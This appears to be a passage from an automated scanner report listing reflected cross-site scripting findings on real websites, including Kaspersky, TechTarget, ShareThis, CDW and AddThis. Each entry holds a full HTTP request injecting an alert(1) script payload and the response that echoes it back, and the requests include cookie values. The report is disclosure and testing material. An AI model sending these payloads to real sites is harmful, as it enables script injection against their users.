X-Varnish-Cache: MISS

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr" xmlns:og="ht
...[SNIP]...
<link rel="canonical" href="http://usa.kaspersky.com/system/lightbox2/filter-xss22859"><script>alert(1)</script>624947042e9" />
...[SNIP]...

1.259. http://usa.kaspersky.com/system/lightbox2/filter-xss [REST URL parameter 3] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://usa.kaspersky.com
Path:	/system/lightbox2/filter-xss

Issue detail

The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload d4bf3"-alert(1)-"2d5a50941d75c5d5f was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The original request used the POST method, however it was possible to convert the request to use the GET method, to enable easier demonstration and delivery of the attack.

Remediation detail

Request

GET /system/lightbox2/filter-xssd4bf3"-alert(1)-"2d5a50941d75c5d5f?string=&allowed_tags=undefined HTTP/1.1
Host: usa.kaspersky.com
Proxy-Connection: keep-alive
Referer: http://usa.kaspersky.com/store/kaspersky-store
Origin: http://usa.kaspersky.com
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: application/json, text/javascript, */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_vi=[CS]v1|2731B5C785013339-4000010CE01E480D[CE]; intcamp=INT1673886; op646kaspersky_us_storepagegum=a01603h0892794r05t3df84d5; NO_CACHE=Y; slider_session=yes; ev5=far%2Bhelp%2Bvirus; s_cc=true; __utma=205612169.764119128.1315138485.1315138485.1315138485.1; __utmb=205612169.9.9.1315139091566; __utmc=205612169; __utmz=205612169.1315138485.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); gpv_pageName=Store%20%7C%20Home%20Users%20%7C%20Kaspersky%20Store; s_nr=1315139100971-New; s_sq=kaspersky-usa%3D%2526pid%253DStore%252520%25257C%252520Home%252520Users%252520%25257C%252520Kaspersky%252520Store%2526pidt%253D1%2526oid%253Dfunctiononclick(event)%25257B%252524('%252523pure-users-3y-prices').show()%25253B%252524('%252523pure-users-2y-prices').hide()%25253B%252524('%252523pure-%2526oidt%253D2%2526ot%253DDIV

Response

HTTP/1.1 404 Not Found
Server: Apache
Last-Modified: Sun, 04 Sep 2011 13:08:37 +0000
Cache-Control: no-cache, must-revalidate, post-check=0, pre-check=0
ETag: "1315141717"
Content-Type: text/html; charset=utf-8
Content-Length: 30870
Date: Sun, 04 Sep 2011 13:08:50 GMT
X-Varnish: 1163126249
Age: 0
Via: 1.1 varnish
Connection: keep-alive
X-Varnish-Cache: MISS

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr" xmlns:og="ht
...[SNIP]...
hank You"; }
s.pageName = s.prop4;
s.eVar44 = s.pageName;
s.hier1 = s.pageName;
s.channel = s.prop1;
s.server=location.hostname;
s.pageName="404:http://usa.kaspersky.com/system/lightbox2/filter-xssd4bf3"-alert(1)-"2d5a50941d75c5d5f?string=&allowed_tags=undefined";

/************* DO NOT ALTER ANYTHING BELOW THIS LINE ! **************/
var s_code=s.t();if(s_code)document.write(s_code)//-->
...[SNIP]...

1.260. http://users.techtarget.com/registration/searchsecurity/InlineRegister.page [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://users.techtarget.com
Path:	/registration/searchsecurity/InlineRegister.page

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload 7415e<script>alert(1)</script>b0b83b2839d was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /registration/searchsecurity7415e<script>alert(1)</script>b0b83b2839d/InlineRegister.page?type=inlineregister&callback=inlineCallback&div=inlineRegistration&pageNumber=1 HTTP/1.1
Host: users.techtarget.com
Proxy-Connection: keep-alive
Referer: http://searchsecurity.techtarget.com/tip/Addressing-the-dangers-of-JavaScript-in-the-enterprise
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: googFCF=a37ee93fdfdd1310VgnVCM1000000d01c80aRCRD; referrer=referrerhttp%3A%2F%2Fwww.google.com%2F%23sclient%3Dpsy%26hl%3Den%26tbm%3Dnws%26source%3Dhp%26q%3D%2522xss.cx%2522%26pbx%3D1%26oq%3D%2522xss.cx%2522%26aq%3Df%26aqi%3D%26aql%3D%26gs_sm%3De%26gs_upl%3D4842l5841l1l6289l8l7l0l0l0l0l221l967l2.3.2l7l0%26fp%3D1%26biw%3D1407%26bih%3D931%26bav%3Don.2%2Cor.r_gc.r_pw.%26cad%3Db%3Bkeyword%2522xss.cx%2522%3Basrc%3Beid%0A; tt_prereg=t1@299972%24t2@301219%24_2011-09-04%2007%3A14%3A05%26g%3D2240040538

Response

HTTP/1.1 500 No registration config found for siteName: searchsecurity7415e<script>alert(1)</script>b0b83b2839d
Server: Resin/3.1.8
Content-Type: text/html; charset=UTF-8
Date: Sun, 04 Sep 2011 12:16:08 GMT
Content-Length: 4042

<!DOCTYPE html PUBLIC
   "-//W3C//DTD XHTML 1.1 Transitional//EN"
   "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
...[SNIP]...
<div style="display:none;">
com.techtarget.registration.context.RegistrationContextException: No registration config found for siteName: searchsecurity7415e<script>alert(1)</script>b0b83b2839d
   at com.techtarget.registration.context.RegistrationContextFactory.getInstanceBySiteName(RegistrationContextFactory.java:43)
   at com.techtarget.registration.interceptor.RegistrationContextInterceptor.
...[SNIP]...

1.261. http://users.techtarget.com/registration/searchsecurity/InlineRegister.page [callback parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://users.techtarget.com
Path:	/registration/searchsecurity/InlineRegister.page

Issue detail

The value of the callback request parameter is copied into the HTML document as plain text between tags. The payload 53dc2<script>alert(1)</script>2eedcb39cc5 was submitted in the callback parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /registration/searchsecurity/InlineRegister.page?type=inlineregister&callback=inlineCallback53dc2<script>alert(1)</script>2eedcb39cc5&div=inlineRegistration&pageNumber=1 HTTP/1.1
Host: users.techtarget.com
Proxy-Connection: keep-alive
Referer: http://searchsecurity.techtarget.com/tip/Addressing-the-dangers-of-JavaScript-in-the-enterprise
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: googFCF=a37ee93fdfdd1310VgnVCM1000000d01c80aRCRD; referrer=referrerhttp%3A%2F%2Fwww.google.com%2F%23sclient%3Dpsy%26hl%3Den%26tbm%3Dnws%26source%3Dhp%26q%3D%2522xss.cx%2522%26pbx%3D1%26oq%3D%2522xss.cx%2522%26aq%3Df%26aqi%3D%26aql%3D%26gs_sm%3De%26gs_upl%3D4842l5841l1l6289l8l7l0l0l0l0l221l967l2.3.2l7l0%26fp%3D1%26biw%3D1407%26bih%3D931%26bav%3Don.2%2Cor.r_gc.r_pw.%26cad%3Db%3Bkeyword%2522xss.cx%2522%3Basrc%3Beid%0A; tt_prereg=t1@299972%24t2@301219%24_2011-09-04%2007%3A14%3A05%26g%3D2240040538

Response

HTTP/1.1 200 OK
Server: Resin/3.1.8
ETag: 9s3zhJPtHtlum8THk2Omj44HV%2B82iqDNAxj3vT5rEzoog644MyV3o3Kf45MRLmS4TNhHgE1LW7KNZ%2FZe1MuJ%2BPJnY%2FzbwzovfJrrtjKzLdphXfJmNclgajuA7jX%2BQo17v6xxuBSiuUr%2BjWuC0k5XKw8l0pnbglSh
Cache-Control: max-age=43200
Cache-Control: private
Expires: Mon, 05 Sep 2011 00:15:23 GMT
Content-Type: application/json; charset=UTF-8
Content-Length: 10157
Date: Sun, 04 Sep 2011 12:15:23 GMT

inlineCallback53dc2<script>alert(1)</script>2eedcb39cc5('inlineRegistration', [{"contentType":"BLOCK","CONTENT":"<style>\r\n.inlineReg_new form input {width:250px;}\r\n.inlineReg_new .inlineRegHeader
...[SNIP]...

1.262. http://users.techtarget.com/registration/searchsecurity/InlineRegister.page [div parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://users.techtarget.com
Path:	/registration/searchsecurity/InlineRegister.page

Issue detail

The value of the div request parameter is copied into the HTML document as plain text between tags. The payload d0093<script>alert(1)</script>c2e731b0e22 was submitted in the div parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /registration/searchsecurity/InlineRegister.page?type=inlineregister&callback=inlineCallback&div=inlineRegistrationd0093<script>alert(1)</script>c2e731b0e22&pageNumber=1 HTTP/1.1
Host: users.techtarget.com
Proxy-Connection: keep-alive
Referer: http://searchsecurity.techtarget.com/tip/Addressing-the-dangers-of-JavaScript-in-the-enterprise
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: googFCF=a37ee93fdfdd1310VgnVCM1000000d01c80aRCRD; referrer=referrerhttp%3A%2F%2Fwww.google.com%2F%23sclient%3Dpsy%26hl%3Den%26tbm%3Dnws%26source%3Dhp%26q%3D%2522xss.cx%2522%26pbx%3D1%26oq%3D%2522xss.cx%2522%26aq%3Df%26aqi%3D%26aql%3D%26gs_sm%3De%26gs_upl%3D4842l5841l1l6289l8l7l0l0l0l0l221l967l2.3.2l7l0%26fp%3D1%26biw%3D1407%26bih%3D931%26bav%3Don.2%2Cor.r_gc.r_pw.%26cad%3Db%3Bkeyword%2522xss.cx%2522%3Basrc%3Beid%0A; tt_prereg=t1@299972%24t2@301219%24_2011-09-04%2007%3A14%3A05%26g%3D2240040538

Response

HTTP/1.1 200 OK
Server: Resin/3.1.8
ETag: 9s3zhJPtHtlum8THk2Omj44HV%2B82iqDNAxj3vT5rEzoog644MyV3o3Kf45MRLmS4pnJA2dkufoNnvOYAh8SNeHrpsd89gnGb5i4ZXx%2B%2FH466qg5N7UhYpErp%2FKgfjQaE%2B0LHMnPBmiOL%2FtijXwG7FqM2eNvIrGqi
Cache-Control: max-age=43200
Cache-Control: private
Expires: Mon, 05 Sep 2011 00:15:30 GMT
Content-Type: application/json; charset=UTF-8
Content-Length: 10157
Date: Sun, 04 Sep 2011 12:15:30 GMT

inlineCallback('inlineRegistrationd0093<script>alert(1)</script>c2e731b0e22', [{"contentType":"BLOCK","CONTENT":"<style>\r\n.inlineReg_new form input {width:250px;}\r\n.inlineReg_new .inlineRegHeader
...[SNIP]...

1.263. http://users.techtarget.com/registration/searchsecurity/InlineRegister.page [pageNumber parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://users.techtarget.com
Path:	/registration/searchsecurity/InlineRegister.page

Issue detail

The value of the pageNumber request parameter is copied into the HTML document as plain text between tags. The payload eb37f<script>alert(1)</script>c6f3dc5025d was submitted in the pageNumber parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /registration/searchsecurity/InlineRegister.page?type=inlineregister&callback=inlineCallback&div=inlineRegistration&pageNumber=1eb37f<script>alert(1)</script>c6f3dc5025d HTTP/1.1
Host: users.techtarget.com
Proxy-Connection: keep-alive
Referer: http://searchsecurity.techtarget.com/tip/Addressing-the-dangers-of-JavaScript-in-the-enterprise
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: googFCF=a37ee93fdfdd1310VgnVCM1000000d01c80aRCRD; referrer=referrerhttp%3A%2F%2Fwww.google.com%2F%23sclient%3Dpsy%26hl%3Den%26tbm%3Dnws%26source%3Dhp%26q%3D%2522xss.cx%2522%26pbx%3D1%26oq%3D%2522xss.cx%2522%26aq%3Df%26aqi%3D%26aql%3D%26gs_sm%3De%26gs_upl%3D4842l5841l1l6289l8l7l0l0l0l0l221l967l2.3.2l7l0%26fp%3D1%26biw%3D1407%26bih%3D931%26bav%3Don.2%2Cor.r_gc.r_pw.%26cad%3Db%3Bkeyword%2522xss.cx%2522%3Basrc%3Beid%0A; tt_prereg=t1@299972%24t2@301219%24_2011-09-04%2007%3A14%3A05%26g%3D2240040538

Response

HTTP/1.1 500 For input string: "1eb37f<script>alert(1)</script>c6f3dc5025d"
Server: Resin/3.1.8
Content-Type: text/html; charset=UTF-8
Date: Sun, 04 Sep 2011 12:15:36 GMT
Content-Length: 4695

<!DOCTYPE html PUBLIC
   "-//W3C//DTD XHTML 1.1 Transitional//EN"
   "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
...[SNIP]...
<div style="display:none;">
java.lang.NumberFormatException: For input string: "1eb37f<script>alert(1)</script>c6f3dc5025d"
   at java.lang.NumberFormatException.forInputString(NumberFormatException.java:48)
   at java.lang.Integer.parseInt(Integer.java:456)
   at java.lang.Integer.valueOf(Integer.java:553)
   at com.techtarget.r
...[SNIP]...

1.264. http://users.techtarget.com/registration/searchsecurity/LoginRegister.page [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://users.techtarget.com
Path:	/registration/searchsecurity/LoginRegister.page

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload 173ae<script>alert(1)</script>b54ff7beeb5 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /registration/searchsecurity173ae<script>alert(1)</script>b54ff7beeb5/LoginRegister.page HTTP/1.1
Host: users.techtarget.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 500 No registration config found for siteName: searchsecurity173ae<script>alert(1)</script>b54ff7beeb5
Server: Resin/3.1.8
Content-Type: text/html; charset=UTF-8
Connection: close
Date: Sun, 04 Sep 2011 14:04:49 GMT
Content-Length: 4042

<!DOCTYPE html PUBLIC
   "-//W3C//DTD XHTML 1.1 Transitional//EN"
   "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
...[SNIP]...
<div style="display:none;">
com.techtarget.registration.context.RegistrationContextException: No registration config found for siteName: searchsecurity173ae<script>alert(1)</script>b54ff7beeb5
   at com.techtarget.registration.context.RegistrationContextFactory.getInstanceBySiteName(RegistrationContextFactory.java:43)
   at com.techtarget.registration.interceptor.RegistrationContextInterceptor.
...[SNIP]...

1.265. http://users.techtarget.com/registration/searchsecurity/Logout.page [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://users.techtarget.com
Path:	/registration/searchsecurity/Logout.page

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload ac59e<script>alert(1)</script>526bc092a14 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /registration/searchsecurityac59e<script>alert(1)</script>526bc092a14/Logout.page HTTP/1.1
Host: users.techtarget.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 500 No registration config found for siteName: searchsecurityac59e<script>alert(1)</script>526bc092a14
Server: Resin/3.1.8
Content-Type: text/html; charset=UTF-8
Connection: close
Date: Sun, 04 Sep 2011 14:04:51 GMT
Content-Length: 4042

<!DOCTYPE html PUBLIC
   "-//W3C//DTD XHTML 1.1 Transitional//EN"
   "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
...[SNIP]...
<div style="display:none;">
com.techtarget.registration.context.RegistrationContextException: No registration config found for siteName: searchsecurityac59e<script>alert(1)</script>526bc092a14
   at com.techtarget.registration.context.RegistrationContextFactory.getInstanceBySiteName(RegistrationContextFactory.java:43)
   at com.techtarget.registration.interceptor.RegistrationContextInterceptor.
...[SNIP]...

1.266. http://users.techtarget.com/registration/searchsecurity/Register.page [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://users.techtarget.com
Path:	/registration/searchsecurity/Register.page

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload 76889<script>alert(1)</script>3e8450bb5ea was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /registration/searchsecurity76889<script>alert(1)</script>3e8450bb5ea/Register.page HTTP/1.1
Host: users.techtarget.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 500 No registration config found for siteName: searchsecurity76889<script>alert(1)</script>3e8450bb5ea
Server: Resin/3.1.8
Content-Type: text/html; charset=UTF-8
Connection: close
Date: Sun, 04 Sep 2011 14:04:51 GMT
Content-Length: 4042

<!DOCTYPE html PUBLIC
   "-//W3C//DTD XHTML 1.1 Transitional//EN"
   "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
...[SNIP]...
<div style="display:none;">
com.techtarget.registration.context.RegistrationContextException: No registration config found for siteName: searchsecurity76889<script>alert(1)</script>3e8450bb5ea
   at com.techtarget.registration.context.RegistrationContextFactory.getInstanceBySiteName(RegistrationContextFactory.java:43)
   at com.techtarget.registration.interceptor.RegistrationContextInterceptor.
...[SNIP]...

1.267. http://wd.sharethis.com/api/getCount2.php [cb parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://wd.sharethis.com
Path:	/api/getCount2.php

Issue detail

The value of the cb request parameter is copied into a JavaScript expression which is not encapsulated in any quotation marks. The payload acb15%3balert(1)//59f765423a2 was submitted in the cb parameter. This input was echoed as acb15;alert(1)//59f765423a2 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /api/getCount2.php?cb=stButtons.processCBacb15%3balert(1)//59f765423a2&url=http%3A%2F%2Fwww.spamfighter.com%2FNews-16694-Skype-Vulnerability-Makes-End-Users-Susceptible-to-Malware-Execution.htm HTTP/1.1
Host: wd.sharethis.com
Proxy-Connection: keep-alive
Referer: http://www.spamfighter.com/News-16694-Skype-Vulnerability-Makes-End-Users-Susceptible-to-Malware-Execution.htm
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __stid=CqCKBE5ezzUzVT7FCnHuAg==

Response

HTTP/1.1 200 OK
Server: nginx/0.8.53
Date: Sun, 04 Sep 2011 12:13:06 GMT
Content-Type: text/html
Connection: keep-alive
Content-Length: 369

(function(){stButtons.processCBacb15;alert(1)//59f765423a2({"url":"http:\/\/www.spamfighter.com\/News-16694-Skype-Vulnerability-Makes-End-Users-Susceptible-to-Malware-Execution.htm","email":1,"linkedin":3,"facebook":1,"twitter":1,"total":5,"ourl":"http:\/\/ww
...[SNIP]...

1.268. http://webobjects2.cdw.com/is/image/CDW/CDW-PGATour-Logo [REST URL parameter 4] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://webobjects2.cdw.com
Path:	/is/image/CDW/CDW-PGATour-Logo

Issue detail

The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload 1622f<img%20src%3da%20onerror%3dalert(1)>ac62859a395 was submitted in the REST URL parameter 4. This input was echoed as 1622f<img src=a onerror=alert(1)>ac62859a395 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /is/image/CDW/CDW-PGATour-Logo1622f<img%20src%3da%20onerror%3dalert(1)>ac62859a395?layer=comp&wid=147&hei=90&fmt=gif,rgb&quantize=adaptive,diffuse,256,&op_sharpen=0&resMode=bicub&op_usm=0.0,0.0,0,0&iccEmbed=0 HTTP/1.1
Host: webobjects2.cdw.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.cdw.com/shop/search/hubs/Products/Software/F.aspx?1d6ea%22%3E%3Cscript%3Eprompt(document.location)%3C/script%3Ed7742b51610=1
Cookie: 3039D25F6DEC4E47B474C3FC71519575=A8A8F83D13EA4F8B917AA5F211762060=75165C11D5234F7D9CF742C32889F929&BA9AA5C91598458BA251A10B273627B6=A04B0B4F3A184E6F9B2F6C8FA16E6CB4&813F9F7AA3924BBEB886AA375A9E8321=&925E59B88B6B46AEB9CB495BFF4D7D2C=&806B512B4E7948E3A3481CCA3CB230A5=

Response

HTTP/1.1 403 Forbidden
Server: Apache-Coyote/1.1
Pragma: no-cache
Content-Type: text/plain
Content-Length: 80
Cache-Control: no-store
Date: Sun, 04 Sep 2011 14:57:34 GMT
Connection: close

Unable to find /CDW/CDW-PGATour-Logo1622f<img src=a onerror=alert(1)>ac62859a395

1.269. http://www.addthis.com/forum/viewtopic.php [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.addthis.com
Path:	/forum/viewtopic.php

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload ab79d"-alert(1)-"4c749860d19 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /forumab79d"-alert(1)-"4c749860d19/viewtopic.php HTTP/1.1
Host: www.addthis.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 404 Not Found
Date: Sun, 04 Sep 2011 14:06:03 GMT
Server: Apache
X-Powered-By: PHP/5.3.3
Vary: Accept-Encoding
Content-Length: 1321
Connection: close
Content-Type: text/html; charset=UTF-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Not found</title>
<l
...[SNIP]...
<script type="text/javascript">
var u = "/404/forumab79d"-alert(1)-"4c749860d19/viewtopic.php";
if (window._gat) {
var gaPageTracker = _gat._getTracker("UA-1170033-1");
gaPageTracker._setDomainName("www.addthis.com");
gaPageTracker._trackPageview(u);
}
</script>
...[SNIP]...

1.270. http://www.addthis.com/forum/viewtopic.php [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.addthis.com
Path:	/forum/viewtopic.php

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 951ef<script>alert(1)</script>f6d78f9a0b6 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /forum951ef<script>alert(1)</script>f6d78f9a0b6/viewtopic.php HTTP/1.1
Host: www.addthis.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 404 Not Found
Date: Sun, 04 Sep 2011 14:06:04 GMT
Server: Apache
X-Powered-By: PHP/5.3.3
Vary: Accept-Encoding
Content-Length: 1347
Connection: close
Content-Type: text/html; charset=UTF-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Not found</title>
<l
...[SNIP]...
<strong>forum951ef<script>alert(1)</script>f6d78f9a0b6/viewtopic.php</strong>
...[SNIP]...

1.271. http://www.addthis.com/forum/viewtopic.php [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.addthis.com
Path:	/forum/viewtopic.php

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload 8ace6<script>alert(1)</script>32e7c1ed20 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /forum/8ace6<script>alert(1)</script>32e7c1ed20 HTTP/1.1
Host: www.addthis.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 404 Not Found
Date: Sun, 04 Sep 2011 14:06:05 GMT
Server: Apache
X-Powered-By: PHP/5.3.3
Vary: Accept-Encoding
Content-Length: 1319
Connection: close
Content-Type: text/html; charset=UTF-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Not found</title>
<l
...[SNIP]...
<strong>forum/8ace6<script>alert(1)</script>32e7c1ed20</strong>
...[SNIP]...

1.272. http://www.addthis.com/forum/viewtopic.php [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.addthis.com
Path:	/forum/viewtopic.php

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 397a9"-alert(1)-"2b19e1ee0b9 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /forum/397a9"-alert(1)-"2b19e1ee0b9 HTTP/1.1
Host: www.addthis.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 404 Not Found
Date: Sun, 04 Sep 2011 14:06:05 GMT
Server: Apache
X-Powered-By: PHP/5.3.3
Vary: Accept-Encoding
Content-Length: 1295
Connection: close
Content-Type: text/html; charset=UTF-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Not found</title>
<l
...[SNIP]...
<script type="text/javascript">
var u = "/404/forum/397a9"-alert(1)-"2b19e1ee0b9";
if (window._gat) {
var gaPageTracker = _gat._getTracker("UA-1170033-1");
gaPageTracker._setDomainName("www.addthis.com");
gaPageTracker._trackPageview(u);
}
</script>
...[SNIP]...

1.273. http://www.addthis.com/forum/viewtopic.php [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.addthis.com
Path:	/forum/viewtopic.php

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload c490e"-alert(1)-"5304d344149 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /forum/viewtopic.php/c490e"-alert(1)-"5304d344149 HTTP/1.1
Host: www.addthis.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 14:06:02 GMT
Server: Apache
X-Powered-By: PHP/5.3.3
Set-Cookie: phpbb3_bkwcz_u=1; expires=Mon, 03-Sep-2012 14:06:02 GMT; path=/; HttpOnly
